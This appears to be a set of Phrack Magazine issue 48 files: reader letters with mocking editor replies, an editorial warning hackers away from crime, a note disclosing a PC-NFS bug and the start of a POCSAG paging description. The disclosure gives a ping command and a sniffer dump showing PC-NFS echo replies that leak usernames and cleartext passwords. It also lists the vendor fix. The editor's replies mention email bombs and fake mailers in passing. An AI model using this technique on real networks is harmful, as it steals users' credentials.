im not familiar with mailing lists and id rather not spend the time
researching the topic...but i need vengeance quickly :-)

any help appreciated,

[ The name for this type of attack?  Uh, an email bomb?

  But let's take a closer look at your mail:

  "id rather not spend the time researching the topic...but I need vengeance

  I'm not going to be your fucking research assistant, or your accomplice.
  If you can't figure out how to look through our back issues to find any of
  the tons of fake mailers we've printed, or figure out how to automate them
  using shell script, then you don't deserve to live, much less
  get your speedy vengeance.

  Couldn't you even come up with a NON-LAME way to get back at someone?  Hell,
  even rewriting their .login to say "exit" or something silly like that is
  more clever, and less cliche, than flooding their inbox. ]


    The art of " information manipulation " has possessed my virgin soul ! I
turned into a fuckin' 2-year old (drool and all) when experiencing the free
local call system involving a paperclip . All I've been thinking is hack,
haCK, HACK ! I'm still drenched behind the ears but I'm a patient, turbo
learner (whatever the hell that means) !

     Here's the problem: I possess some info that could make you smile so
big, that your sphinctor would unwrinkle. I would like to experiment, if you
will . Perhaps, dabble with this stuff , but I am very uneducated in raping
mainframes. This could be a major wood producer 
because my EX works at this establishment .

     I need a trustworthy pro who possesses a plethora of tasty tactics . Whic
h way to the Dagobah System.....I seek YODA !!
[ Drooling 2-year old.

  Very uneducated in raping mainframes.

  Major wood producer.

  Well, gee, I'm sure your info would make my "sphinctor" unwrinkle, but I'm
  wearing a new pair of jeans, so I guess I'll have to take a rain check.

  God bless AOL for bringing the internet to the masses! ]


i want to be added to your list. and could you send me unziped hacking 
software or can you tell me how to unzip softwarre nd a beginners guide 
to hacking. i would appreciate it i want to begin fun new field of 
hacking thank you

[ You want to learn all about hacking, but you don't know how to unzip

  Crawl before you run, Kwai Chang. ]



Anh Ta'm ddi du xa, ngu? ta.i mo^.t kha'ch sa.n.  DDa~ ma^'y 
tie^'ng ddo^`ng ho^` ro^`i anh ngu? kho^ng ddu*o*.c vi` tie^'ng cu*o*`i 
no'i huye^n na'o tu*` pho`ng be^n ca.nh sang.  Ro~ ra`ng la` ho. 
ddang dda'nh ba`i, sa't pha.t nhau a(n thua lo*'n.

Ra'ng nhi.n cho to*'i 3 gio*` sa'ng va^~n cu*' tra(`n tro.c hoa`i, anh 
Ta'm chi.u he^'t no^?i, be`n go~ nhe. va`o va'ch dde^? nha('c khe'o 
pho`ng be^n ca.nh.

Anh Ta'm vu*`a go~ xong la^.p tu*'c anh nghe mo^.t tenor he't le^n 
tu*` pho`ng be^n:

-  Tro*`i o*i!  Co' bie^'t ba^y gio*` la` ma^'y gio*` sa'ng ro^`i 
   kho^ng?  O*? ddo' ma` ddo'ng ddinh treo hi`nh!

-  ?!?!?

[Uh, let's see...No Boom Boom with soul brother.  Soul Brother too beaucoup.

 Ddi Ma'o.]


Hola me gustaria tener mucha informacion de lo que ustedes hacen sobre 
todo de como lo hacen. Es decir que me manden informacion de los secretos 
de los sistemas operativos de internet  de todo lo que me puedan mandar.
  yo soy universitario, y me gusta todo lo relacionado con redes.

Muchos saludos.

[ What is this, International Day?

  !Si quieras mucha informacion, LEA MUCHOS LIBROS!  !DIOS MIO!  !No estoy
  el maestro del mundo!  Ehehe, esta fue solomente una chiste.  No esta
  nunca libros en espanol sobre <<computer security>>.  Que lastima.

  If you want to learn, start with english...then go buy the entire O'Reilly
  Yellow series and Blue series.  That will get you started learning
  "los secretos de los sistemas operativos de internet." ]


From: "Erik K. Escobar"
Subject: Apology

This letter is to be forwared to the newsgroup io.general by madmagic, in 
care of Mr. Escobar. 

I would like to send a public apology to Internex Online for the 
treatment I have given the staff and users of this system.  I threw 
around some threats and words that can incriminate me, and realized that 
it was a stupid idea on my behalf.  In the last week or so with the 
negative attention I have gotten, I got to know the IO/ICAN staff a bit 
better and everything in good standing. Me and Internex Online are now 
even and there will be no retaliation or sour words from me. I just want 
everything to go back to the norm.


[ * AND THEN * ]

From: "Erik K. Escobar"
Subject: Shit

As my understanding, A letter of apology under my name was redistributed 
around within my mailing list and whatever.  As some of you know, myself 
and Zencor have been having problems with Internex in the past and near 
the middle of this week, I got into a large battle with was ACC, ICAN, 
and Internex Online -vs- Me.  It is stupid to get into an argument with 
that many corporations, and a few words and threats were thrown, they 
locked my account.  I wrote a letter in response of that and they 
proceded to lock other Zencor staff accounts and hack our web site. Also 
they posted the letter in the news groups and whatever.  They eventually 
decided to charge me and whatever, and to save me time outta the courts 
and crap like that I made an apology for the threats, seeing that they 
could incriminate me.  Internex has done wrong and I probably won't be 
seeing alot of apologies coming my way. If they didn't have certain info 
about me..they could have me very well laughing at them but that is not 
the case.

Lord Kaotik

[ Can you say, LAME? ]


Been trying to locate for some time the file, plusmap.txt that used to be on
the phrack bbs (716-871-1915).  This file outlined information regarding the
videopal in the videocipher II plus satellite decoder module.  Any idea where
I might find this file?

[ I didn't know there was a "phrack" bbs.  <Sigh>

  In any case, I would look for information regarding this on the following

  Satellite Watch BBS : 517-685-2451

  This ought to get you in the right direction. ]



Just a quick note to tell you about the Hawaii Education Literacy Project -
a non-profit organization - and our efforts to promote literacy by making
electronic text easier and more enjoyable to read.  Given that we're both in
the reading biz, I thought you might be interested.

ReadToMe, our first program, reads aloud any form of electronic text,
including Web pages, and is free to anyone who wishes to use it.  

The "Web Designers" section of our home page tells you how your pages can
literally speak to your audience.  Actually, all you need to do to make your
pages audible is to add the following html code:

<P><A HREF="">Hear
This Page!</A> Requires ReadToMe Software... Don't got it? <A

A beta test version of the program can be obtained from  I encourage you and your readers to download
a copy and take it for a spin.  

Thank you for your time,

Rob Hanson
Hawaii Education Literacy Project

[ Honestly, I don't know if this is a spam to a list of magazine people, or
  really a phrack reader.  I have this thing about jumk email, and the joy of
  offering that info to our thousands of bored hacker readers looking for
  an excuse to fuck with some system.

  I'll let them decide if this was a spam.  Thanks, Rob. ]


SYNTHETIC PLEASURES  opens in the US theaters
save the date, spread the word. forgive us if you got this before.

eerily memorable is SYNTHETIC PLEASURES, a trippy, provocative tour through
the perfectly artificial worlds of cyberspace, plastic surgery,
mind-altering chemicals and controlled, man-made environments that
questions whether the natural world is redundant, or even necessary. those
who see it will want to pinch themselves when it's over.
(janet maslin- The New York Times)

for further info contact:

first opening dates:

Aug 29 Los Angeles, CA- Nuart Theatre
Aug 30 San Francisco, CA- Castro Theatre
Aug 30 Berkeley, CA- UC Theatre
Aug 30 San Jose, CA- Towne Theatre
Aug 30 Palo Alto, CA- Aquarius Theatre
Aug 30 Portland, OR- Cinema 21
Sept 13 San Diego, CA- Ken Theatre
Sept 13 NYC, NY- Cinema Village
Sept 13 NYC, NY- City Cinemas
Sept 13 Larkspur, CA- Larkspur Theatre
Sept 20 Boston, MA- Kendall Square Theater
Sept 20 Cleveland, OH- Cedar Lee
Sept 20 Philadelphia, PA- Ritz
Sept 22 Vorheess, NJ- Ritz 12
Sept 27 Austin, TX- Dobie Theater
Sept 27 New Haven, CT- York Theatre
Sept 27 Pittsburgh,PA- Rex
Oct 4 Washington, DC- Key Cinema
Oct 11 Providence, RI- Avon Theater
Oct 11 Kansas City, MO- Tivoli
Oct 11  Baltimore,MD - Charles Theatre
Oct 18  Waterville MA- Railroad Square
Oct 18  Durham,NC - Carolina Theater
Oct 18 Raleigh, NC - Colony Theater
Oct 18 Chapel Hill,NC -The Chelsea Theatre
Oct 25 Seattle, WA- Varsity
Nov 8 Ft Lauderdale FL- Fox Sunrise
Nov 15 Gainesville,FL - Plaza Theater
Nov 16 Hanover, NH- Dartmouth Theater
Nov 22 Miami, FL- Alliance
Nov 25,29,30 Tampa FL - Tampa Theatre
Dec 13 Chicago, IL - Music Box


  I wonder what lovely cgi-bin holes that WWW site is sporting.

  But wait, maybe they just want some k-rad cyber-press like
  MGM got for the "Hackers" WWW page.  Oh man, what a dilemma.
  To hack, or not to hack.  Assholes. ]


                              ==Phrack Magazine==

                   Volume Seven, Issue Forty-Eight, File 2a of 18

                                Phrack Editorial
                                  Erik Bloodaxe

This may very well be my last Phrack editorial, since I'm no longer going to
fill the day-to-day role of editor, so I figure I ought to close out my
crusade to piss everyone off.

I don't like most of you people.  The hacking subculture has become a
mockery of its past self.  People might argue that the community has
"evolved" or "grown" somehow, but that is utter crap.  The community
has degenerated.  It has become a media-fueled farce.  The act of intellectual
discovery that hacking once represented has now been replaced by one of
greed, self-aggrandization and misplaced post-adolescent angst.

DefCon IV epitomized this change in such amazing detail, that I can only hope
to find words to describe it adequately.  Imagine the bastard offspring
of Lollapalooza and a Star Trek convention.  Imagine 300+ people out of their
homes, and away from Mother's watchful eye for the first time in their
pathetic lives.  Imagine those same people with the ego of Rush Limbaugh and
the social skills of Jeffrey Dahmer, armed with laptops loaded with programs
they can't use, and talking at length to reporters about techniques they
don't understand.  Welcome to DefCon.

If I were to judge the health of the community by the turnout of this
conference, my prognosis would be "terminally ill."

It would seem that "hacking" has become the next logical step for many people
looking for an outlet to strike back at "something."  "Well, gee, I've already
pierced every available piece of skin on my body and dyed my hair blue...what
on earth can I do now to shock my parents?  I know!  I'll break some federal
laws, and maybe get my name in the paper!  THAT WOULD BE COOL!  It'll be
just like that movie!"

I hate to burst everyone's bubble, but you are so fucked up.

In this day and age, you really don't have to do anything illegal to be
a hacker.  It is well within the reach of everyone to learn more, and use
more powerful computers legally than any of us from the late 70's and early
80's ever dreamed.  Way back then, it was ALL about learning how to use these
crazy things called computers.  There were hundreds of different types of
systems, hundreds of different networks, and everyone was starting from ground
zero.  There were no public means of access; there were no books in stores or
library shelves espousing arcane command syntaxes; there were no classes
available to the layperson.  We were locked out.

Faced with these obstacles, normal, intelligent, law-abiding adolescents from
around the globe found themselves attempting to gain access to these
fascinating machines through whatever means possible.  There simply was
no other way.  There were no laws, and yet everyone knew it wasn't strictly
kosher behavior.  This fact added a cheap rush to the actual break-in, but
the main drive was still simply to learn.

Now, with the majority of operating systems being UNIX-based, and the majority
of networks being TCP/IP-based the amount of knowledge to be gathered has
shrunk considerably.  With the incredibly low prices of powerful personal
computers, and the free availablity of complex operating systems, the need
to break into remote systems in order to learn has been removed.  The only
possible needs being met by remote intrusions would be a means to gather
specific information to be sold, or that base psychological rush from doing
something forbidden and getting away with it.  Chasing any high only leads
to a serious crash, and in the case of breaking into computers, that
only leads to jail.

There is absolutely nothing cool about going to jail.  I know too many
people who are currently in jail, who have been in jail, and some who are
on their way to jail.  Trust me on this, people.  You will not be
respected by anyone if you act rashly, do something careless and
end up being convicted of several felonies.  In fact, all of your "friends,"
(those who didn't get busted along with you, and turn state's evidence against
you) will just think you were a moron for being so sloppy...until they also
get nailed.

Get raided and you will almost certainly spend time in jail.  Even once you
are released, you will lose your passport and your ability to travel freely,
you will lose your ability to do business in classified environments, you
will become unemployable by most companies, you may even lose your rights to
use computer or networking equipment for years.  Is is still worth it?

I break into computers for a living, and I love my job.  However, I don't
kid myself about just how lucky I really am.  Don't fool yourselves into
thinking that it was easy for me to achieve this, or that anyone else can
easily slip into such a role.  Staking out a claim in the information security
industry is a continual battle for a hacker.  Your past will constantly
stand in your way, especially if you try to hide it and lie to everyone.
(Read the recent Forbes ASAP article and spot the hacker from Garrison
Associates lying about his past, although he was raided for running
the Scantronics Publications BBS in San Deigo just a few short years ago.
Shame on you Kludge.)

I've never lied about anything, so that can't be held over my head.  I've
never been convicted of anything either, although I came closer to jail
than hopefully any of you will ever experience.  The ONLY reason I avoided
prison was the fact that law enforcement was not prepared to deal with
that type of crime.  Now, I've taught many of those same law enforcement
agencies about the nature of computer crimes.  They are all learning and
not making the same mistakes any more.

At the same time, the technology to protect against intrusions has increased
dramatically.  Technology now exists that will not only stop attacks, but
identify the attack methodology, the location of the attacker, and take
appropriate countermeasures all in real-time.  The company I work for makes it.
I've always said that anything that can stop me will stop almost anyone,
even through I'm not anywhere close to the world's best.  There simply
aren't that many things to monitor, once you know what to look for.

The rewards have diminished and the risks have increased.

Hacking is not about crime.  You don't need to be a criminal to be a hacker.
Hanging out with hackers doen't make you a hacker any more than hanging
out in a hospital makes you a doctor.  Wearing the t-shirt doesn't
increase your intelligence or social standing.  Being cool doesn't mean
treating everyone like shit, or pretending that you know more than everyone
around you.

Of course, I'm just a bitter old sell-out living in the past, so
what do I know?

Well, what I do know, is that even though I'm one of the few screaming about
how fucked up and un-fun everything has become, I'm not alone in my disgust.
There are a bunch of us who have reached the conclusion that the "scene"
is not worth supporting; that the cons are not worth attending; that the
new influx of would-be hackers is not worth mentoring.  Maybe a lot of us
have finally grown up.

In response, expect a great many to suddenly disappear from the cons.  We'll be
doing our own thing, drinking a few cool drinks someplace warm, and reflecting
on the collective pasts we've all drawn from, and how the lack of that
developmental stage has ruined the newer generations.  So those of us
with that shared frame of reference will continue to meet, enjoy each
other's company, swap stock tips in the same breath as operating system
flaws, and dream about the future of security.

You're probably not invited.



                         ==Phrack Magazine==

              Volume Seven, Issue Forty-Eight, File 3 of 18

                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                Part I



I have found a nice little security hole in PC-NFS version 5.x.  If you 
ping a PC-NFS user with a packet size of between 1450 to 1480, the 
PC's ICMP reply packet will divulge:

	o The hostname of the PC
	o The hostname of the PC's authentication server
	o The username of the person logged in
	o The password for the user (Thank you very much!)

All of this information is in clear text unless PC-NFS's NETLOGIN is 
used.  NETLOGIN uses XOR as its encryption, so this is hardly secure 

NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested 
and all freely return the above information on both PC-NFS versions 
5.0 and 5.1a.  This should work with other driver/NIC configurations 

You get the occasional added bonus of locking up the victims PC as 

This bug was new to Sun and they have created a new PCNFS.SYS 
driver for us.  They have labeled it PC-NFS.SYS version 5.1a.DOD.  
This new version fills reply ICMP packets with nulls after 200 bytes of
the requested pattern.

Until you receive this patch from Sun, I would recommend setting all 
external router interface MTU to a value of no greater than 1350 as this 
is point where secrets are contained in the return packet.

The Unix command to generate the below results is as follows:

	ping -s -c1 1480

Use your favorite sniffer to filter ICMP packets and you have it.  If you 
don't have a sniffer, try the -v(erbose) option of ping and convert the 
hex to ascii starting around byte 1382.

Sniffer output follows:

        icmp: echo request
        62: 024 025 026 027 030 031 032 033 034 035
        72: 036 037       !   "   #   $   %   &   '
        82:   (   )   *   +   ,   -   .   /   0   1
        92:   2   3   4   5   6   7   8   9   :   ;
        102:   <   =   >   ?   @   A   B   C   D   E
        112:   F   G   H   I   J   K   L   M   N   O
        122:   P   Q   R   S   T   U   V   W   X   Y
        132:   Z   [   \   ]   ^   _   `   a   b   c
        142:   d   e   f   g   h   i   j   k   l   m
        152:   n   o   p   q   r   s   t   u   v   w
        162:   x   y   z   {   |   }   ~ 177 200 201
        172: 202 203 204 205 206 207 210 211 212 213
        182: 214 215 216 217 220 221 222 223 224 225
        192: 226 227 230 231 232 233 234 235 236 237
        202: 240 241 242 243 244 245 246 247 250 251
        212: 252 253 254 255 256 257 260 261 262 263
        222: 264 265 266 267 270 271 272 273 274 275
        232: 276 277 300 301 302 303 304 305 306 307
        242: 310 311 312 313 314 315 316 317 320 321
        252: 322 323 324 325 326 327 330 331 332 333
        262: 334 335 336 337 340 341 342 343 344 345
        272: 346 347 350 351 352 353 354 355 356 357
        282: 360 361 362 363 364 365 366 367 370 371
        292: 372 373 374 375 376 377 000 001 002 003
        302: 004 005 006 007 010 011 012 013 014 015
        312: 016 017 020 021 022 023 024 025 026 027
        322: 030 031 032 033 034 035 036 037       !
        332:   "   #   $   %   &   '   (   )   *   +
        342:   ,   -   .   /   0   1   2   3   4   5
        352:   6   7   8   9   :   ;   <   =   >   ?
        362:   @   A   B   C   D   E   F   G   H   I
        372:   J   K   L   M   N   O   P   Q   R   S
        382:   T   U   V   W   X   Y   Z   [   \   ]
        392:   ^   _   `   a   b   c   d   e   f   g
        402:   h   i   j   k   l   m   n   o   p   q
        412:   r   s   t   u   v   w   x   y   z   {
        422:   |   }   ~ 177 200 201 202 203 204 205
        432: 206 207 210 211 212 213 214 215 216 217
        442: 220 221 222 223 224 225 226 227 230 231
        452: 232 233 234 235 236 237 240 241 242 243
        462: 244 245 246 247 250 251 252 253 254 255
        472: 256 257 260 261 262 263 264 265 266 267
        482: 270 271 272 273 274 275 276 277 300 301
        492: 302 303 304 305 306 307 310 311 312 313
        502: 314 315 316 317 320 321 322 323 324 325
        512: 326 327 330 331 332 333 334 335 336 337
        522: 340 341 342 343 344 345 346 347 350 351
        532: 352 353 354 355 356 357 360 361 362 363
        542: 364 365 366 367 370 371 372 373 374 375
        552: 376 377 000 001 002 003 004 005 006 007
        562: 010 011 012 013 014 015 016 017 020 021
        572: 022 023 024 025 026 027 030 031 032 033
        582: 034 035 036 037       !   "   #   $   %
        592:   &   '   (   )   *   +   ,   -   .   /
        602:   0   1   2   3   4   5   6   7   8   9
        612:   :   ;   <   =   >   ?   @   A   B   C
        622:   D   E   F   G   H   I   J   K   L   M
        632:   N   O   P   Q   R   S   T   U   V   W
        642:   X   Y   Z   [   \   ]   ^   _   `   a
        652:   b   c   d   e   f   g   h   i   j   k
        662:   l   m   n   o   p   q   r   s   t   u
        672:   v   w   x   y   z   {   |   }   ~ 177
        682: 200 201 202 203 204 205 206 207 210 211
        692: 212 213 214 215 216 217 220 221 222 223
        702: 224 225 226 227 230 231 232 233 234 235
        712: 236 237 240 241 242 243 244 245 246 247
        722: 250 251 252 253 254 255 256 257 260 261
        732: 262 263 264 265 266 267 270 271 272 273
        742: 274 275 276 277 300 301 302 303 304 305
        752: 306 307 310 311 312 313 314 315 316 317
        762: 320 321 322 323 324 325 326 327 330 331
        772: 332 333 334 335 336 337 340 341 342 343
        782: 344 345 346 347 350 351 352 353 354 355
        792: 356 357 360 361 362 363 364 365 366 367
        802: 370 371 372 373 374 375 376 377 000 001
        812: 002 003 004 005 006 007 010 011 012 013
        822: 014 015 016 017 020 021 022 023 024 025
        832: 026 027 030 031 032 033 034 035 036 037
        842:       !   "   #   $   %   &   '   (   )
        852:   *   +   ,   -   .   /   0   1   2   3
        862:   4   5   6   7   8   9   :   ;   <   =
        872:   >   ?   @   A   B   C   D   E   F   G
        882:   H   I   J   K   L   M   N   O   P   Q
        892:   R   S   T   U   V   W   X   Y   Z   [
        902:   \   ]   ^   _   `   a   b   c   d   e
        912:   f   g   h   i   j   k   l   m   n   o
        922:   p   q   r   s   t   u   v   w   x   y
        932:   z   {   |   }   ~ 177 200 201 202 203
        942: 204 205 206 207 210 211 212 213 214 215
        952: 216 217 220 221 222 223 224 225 226 227
        962: 230 231 232 233 234 235 236 237 240 241
        972: 242 243 244 245 246 247 250 251 252 253
        982: 254 255 256 257 260 261 262 263 264 265
        992: 266 267 270 271 272 273 274 275 276 277
        1002: 300 301 302 303 304 305 306 307 310 311
        1012: 312 313 314 315 316 317 320 321 322 323
        1022: 324 325 326 327 330 331 332 333 334 335
        1032: 336 337 340 341 342 343 344 345 346 347
        1042: 350 351 352 353 354 355 356 357 360 361
        1052: 362 363 364 365 366 367 370 371 372 373
        1062: 374 375 376 377 000 001 002 003 004 005
        1072: 006 007 010 011 012 013 014 015 016 017
        1082: 020 021 022 023 024 025 026 027 030 031
        1092: 032 033 034 035 036 037       !   "   #
        1102:   $   %   &   '   (   )   *   +   ,   -
        1112:   .   /   0   1   2   3   4   5   6   7
        1122:   8   9   :   ;   <   =   >   ?   @   A
        1132:   B   C   D   E   F   G   H   I   J   K
        1142:   L   M   N   O   P   Q   R   S   T   U
        1152:   V   W   X   Y   Z   [   \   ]   ^   _
        1162:   `   a   b   c   d   e   f   g   h   i
        1172:   j   k   l   m   n   o   p   q   r   s
        1182:   t   u   v   w   x   y   z   {   |   }
        1192:   ~ 177 200 201 202 203 204 205 206 207
        1202: 210 211 212 213 214 215 216 217 220 221
        1212: 222 223 224 225 226 227 230 231 232 233
        1222: 234 235 236 237 240 241 242 243 244 245
        1232: 246 247 250 251 252 253 254 255 256 257
        1242: 260 261 262 263 264 265 266 267 270 271
        1252: 272 273 274 275 276 277 300 301 302 303
        1262: 304 305 306 307 310 311 312 313 314 315
        1272: 316 317 320 321 322 323 324 325 326 327
        1282: 330 331 332 333 334 335 336 337 340 341
        1292: 342 343 344 345 346 347 350 351 352 353
        1302: 354 355 356 357 360 361 362 363 364 365
        1312: 366 367 370 371 372 373 374 375 376 377
        1322: 000 001 002 003 004 005 006 007 010 011
        1332: 012 013 014 015 016 017 020 021 022 023
        1342: 024 025 026 027 030 031 032 033 034 035
        1352: 036 037       !   "   #   $   %   &   '
        1362:   (   )   *   +   ,   -   .   /   0   1
        1372:   2   3   4   5   6   7   8   9   :   ;
        1382:   <   =   >   ?   @   A   B   C   D   E
        1392:   F   G   H   I   J   K   L   M   N   O
        1402:   P   Q   R   S   T   U   V   W   X   Y
        1412:   Z   [   \   ]   ^   _   `   a   b   c
        1422:   d   e   f   g   h   i   j   k   l   m
        1432:   n   o   p   q   r   s   t   u   v   w
        1442:   x   y   z   {   |   }   ~ 177 200 201
        1452: 202 203 204 205 206 207 210 211 212 213
        1462: 214 215 216 217 220 221 222 223 224 225
        1472: 226 227 230 231 232 233 234 235 236 237
        1482: 240 241 242 243 244 245 246 247 250 251

        icmp: echo reply
        62: 024 025 026 027 030 031 032 033 034 035
        72: 036 037       !   "   #   $   %   &   '
        82:   (   )   *   +   ,   -   .   /   0   1
        92:   2   3   4   5   6   7   8   9   :   ;
        102:   <   =   >   ?   @   A   B   C   D   E
        112:   F   G   H   I   J   K   L   M   N   O
        122:   P   Q   R   S   T   U   V   W   X   Y
        132:   Z   [   \   ]   ^   _   `   a   b   c
        142:   d   e   f   g   h   i   j   k   l   m
        152:   n   o   p   q   r   s   t   u   v   w
        162:   x   y   z   {   |   }   ~ 177 200 201
        172: 202 203 204 205 206 207 210 211 212 213
        182: 214 215 216 217 220 221 222 223 224 225
        192: 226 227 230 231 232 233 234 235 236 237
        202: 240 241 242 243 244 245 246 247 250 251
        212: 252 253 254 255 256 257 260 261 262 263
        222: 264 265 266 267 270 271 272 273 274 275
        232: 276 277 300 301 302 303 304 305 306 307
        242: 310 311 312 313 314 315 316 317 320 321
        252: 322 323 324 325 000 000 324 005   ^   $
        262:   : 004 000 000 000 000 000 000 000 000
        272: 036 006   W   V   P   S   Q   R 016 007
        282: 277   ^   $ 213 367 350   X   p   r   c
        292: 212   E   "   < 000   u 005 350   V 003
        302: 353   W   < 005   u 005 350   W 002 353
        312:   N   < 010   u 007 306 006 325   # 001
        322: 353   H   < 015   u 007 306 006 325   #
        332: 001 353   =   < 017   u 007 306 006 325
        342:   # 001 353   2   < 022   u 005 350 021
        352: 002 353   $   < 003   u 005 350   9 003
        362: 353 033   < 022   w 017   2 344 213 360
        372: 212 204 300   #   P 350 225 305   X 353
        382: 010   P 270   c 000 350 213 305   X 306
        392: 006 205 347 000   Z   Y   [   X   ^   _
        402: 007 037 313   P   S   Q   R   U 036 006
        412:   W   V 214 310 216 330 216 300 306 006
        422: 325   # 000 373 277   ^   $ 273   A 347
        432: 271 006 000 215   6   d   $ 212 004 210
        442: 005 212 007 210 004   F   G   C 342 363
        452: 241   x   $ 243   |   $ 241   z   $ 243
        462:   ~   $ 241 324   ) 243   x   $ 241 326
        472:   ) 243   z   $ 277   ^   $ 212   E   "
        482:   < 010   u 015   P 270   ` 000 350   $
        492: 305   X 350 275 001 353 022   < 015   u
        502: 012   P 270   a 000 350 023 305   X 353
        512: 004   < 017   u 003 350 017 000 306 006
        522: 205 347 000   ^   _ 007 037   ]   Z   Y
        532:   [   X 303   P 270   < 000 350 363 304
        542:   X 307   E   $ 000 000 215   u   " 213
        552:   M 020 206 351 203 351 024 367 301 001
        562: 000   t 006 213 331 306 000 000   A 321
        572: 371 350   ,   o 211   ]   $ 307   E 030
        582: 000 000 215   u 016 271 012 000 350 033
        592:   o 211   ] 030 213   E 020 206 340 005
        602: 016 000 243   `   % 211   >   b   % 214
        612: 016   d   % 277   ^   %   . 376 006   ?
        622: 020 350   9 276   . 376 016   ? 020 303
        632:   & 213   E 002 013 300   t 020 243 326
        642:   #   & 213   ] 004 211 036 330   # 350
        652: 231   m 353   0 200   > 324   ) 000   t
        662: 033   & 203   } 006 000   t 024 203   >
        672: 326   # 000   u 015 350 031 000 203   >
        682: 326   # 000   t 003 350   u   m 241 326
        692:   #   & 211   E 002 241 330   #   & 211
        702:   E 004 303   & 213   M 006 006   V   W
        712: 016 007 272 000 000 277 334   # 350   $
        722: 000 241 323   # 243 350   X 203   > 326
        732:   # 000   u 023 366 006 343 015 001   u
        742: 014 203   > 350   X 000   u 353 272 001
        752: 000 342 332   _   ^ 007 303   Q   R   W
        762: 203 372 000   u 021 203   > 030 214 000
        772:   t 012 276 004 214 271 003 000 363 245
        782: 353 010 270 377 377 271 003 000 363 253
        792: 276   A 347 271 003 000 363 245   _ 270
        802: 377 377 211   E 036 211   E     241 324
        812:   ) 211   E 032 241 326   ) 211   E 034
        822: 270     000 206 340 211   E 020 306   E
        832: 016   E 306   E 017 000 307   E 022 000
        842: 000 307   E 024 000 000 306   E 026 002
        852: 306   E 027 001 307   E 014 010 000   3
        862: 300 306   E   " 021 210   E   # 211   E
        872:   & 211   E   ( 350 250 376   Z   Y 303
        882: 200   > 326   # 000   u 014 213   E   *
        892: 243 326   # 213   E   , 243 330   #   P
        902: 270   V 000 350 205 303   X 303   P   S
        912:   Q   R 213   E   : 213   ]   < 213   M
        922:   & 213   U   ( 350 223   k   Z   Y   [
        932:   X   P 270   \ 000 350   e 303   X 303
        942: 306   E   " 000   P 270   X 000 350   X
        952: 303   X 303   & 213   E 002   & 213   ]
        962: 004   & 213   U 006 006   W 016 007 350
        972:   Y   i   s 003 351 227 000 277 334   #
        982:   W 271 003 000 363 245 276   A 347 271
        992: 003 000 363 245   _ 211   E 036 211   ]
        1002:     241 324   ) 211   E 032 241 326   )
        1012: 211   E 034 270     000 206 340 211   E
        1022: 020 306   E 016   E 306   E 017 000 307
        1032:   E 022 000 000 307   E 024 000 000 306
        1042:   E 026 377 306   E 027 001 307   E 014
        1052: 010 000   3 300 306   E   " 010 210   E
        1062:   # 211   E   & 377 006   h   % 241   h
        1072:   % 211   E   ( 211 026 350   X 211 026
        1082:   l   % 307 006   j   % 000 000 350 322
        1092: 375 203   > 350   X 000   t   # 366 006
        1102: 343 015 001   u   ! 203   >   j   % 000
        1112:   t 353 203   >   j   % 001   u 011 241
        1122:   l   %   + 006 350   X 353 015 270 375
        1132: 377 353 010 270 376 377 353 003 270 377
        1142: 377 307 006   l   % 000 000   _ 007   &
        1152: 211   E 010 303   P 270   ^ 000 350 206
        1162: 302   X 203   >   l   % 000   t 017 213
        1172:   ]   (   ; 036   h   %   u 006 307 006
        1182:   j   % 001 000 303   P 270   ; 000 350
        1192:   g 302   X 203   >   l   % 000   t 006
        1202: 307 006   j   % 002 000 303 000 000 000
        1212: 000 000 000 000 000 000 000 000 000 000
        1222: 000 000 000 000 000 000 000 000 000 000
        1232: 000 000 000 000 000 000 000 000 000 000
        1242: 000 000 000 000 000 000 000 000 002 000
        1252: 000 000 300   A 000 000 034 000 000 000
        1262: 200 000 000 000   k 000 000 000 000 016
        1272: 000 000 000     000 000 000 000 000 000
        1282: 010 000 000 000 252 001 000 000 010   5
        1292: 000 000   r 027 301   . 000 000 000 000
        1302: 036   F 300   . 000 000 000 000 036   F
        1312: 300   . 000 000 000 000 000 000 000 000
        1322: 000 000 000 000 000 000 000 000 000 000
        1332: 000 000 000 000 000 000 000 000 000 000
        1342: 000 000 000 000 000 000 000 000 000    
        1352: 000 000 000 002 000 000 200 366   = 000
        1362:   { 255 023 000 242 265 015 000 002 000
        1372: 000 000   S 017 005 000   C 003 000 000
        1382:   p   c   h   o   s   t 000 000 000 000
        1392: 000 000 000 000 000 000 244   A   @   -
        1402:   s   e   r   v   e   r   1 000 000 000
        1412: 000 000 000 000 000 000 244   A   @ 001
        1422: 000 000 000 000 000 000 000 000 000 000
        1432: 000 000 000 000 000 000 244   A   @ 001
        1442:   u   s   e   r   n   a   m   e 000 000
        1452:   p   a   s   s   w   d 000 000 000 000
        1462: 000 000 000 000 000 000 000 000 000 000
        1472: 000 000 000 000 000 000 000 000 000 000
        1482: 000 000 200 000   k 000 260 271 377 377
        1492: 344 275   9 212

The names have been changed to protect the innocent, but the rest is actual.

Byte 1382:  PC's hostname
Byte 1402:  PC's Authentication server hostname
Byte 1382:  The user's account name.  Shows nobody if logged out.
Byte 1382:  The user's password.


		POCSAG paging format, code and code capacity

The POCSAG (Post Office Code Standardization Advisory Group) code is a
synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
structure. The POCSAG codes provides improved battery-saving capability and an
increased code capacity.
The POCSAG code format consists of a preamble and one or more batches of
codewords. Each batch comprises a 32-bit frame synchronization code and eight
64-bit address frames of two 32-bit addresses or idle codewords each. The
frame synchronization code marks the start of the batch of codewords.

The preamble consists of 576 bits of an alternating 101010 pattern transmitted
at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
determine if the data received is a POCSAG signal and for synchronization with
the stream of data.

       |---Preamble----|-----------First Batch-------------|--Subsec. Batch--|

        ______________________________________________________< <____________
paging |  576 bits of  | |   |   |   |   |   |   |   |   | |   > >           |
format |   reversals   |F| | | | | | | | | | | | | | | | |F|                 |
       | (101010, etc) |S| | | | | | | | | | | | | | | | |S|                 |
       |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
							       > >

		Preamble	Batchs

 512 BPS	1125 mS		1062.5 mS

1200 BPS	 480 mS		 453.3 mS

CodeWords Structure
BIT    |   |              |       |                       |                 |
NUMBER | 1 |   2 to 19    | 20,21 |       22 to 31        |        32       |
ADDRESS|   |              |       |                       |                 | 
FORMAT | 0 | Address Bits | S I B |   Parity Check Bits   |   Even parity   |
                              Source identifier bits 
MESSAGE|   |                      |                       |                 |
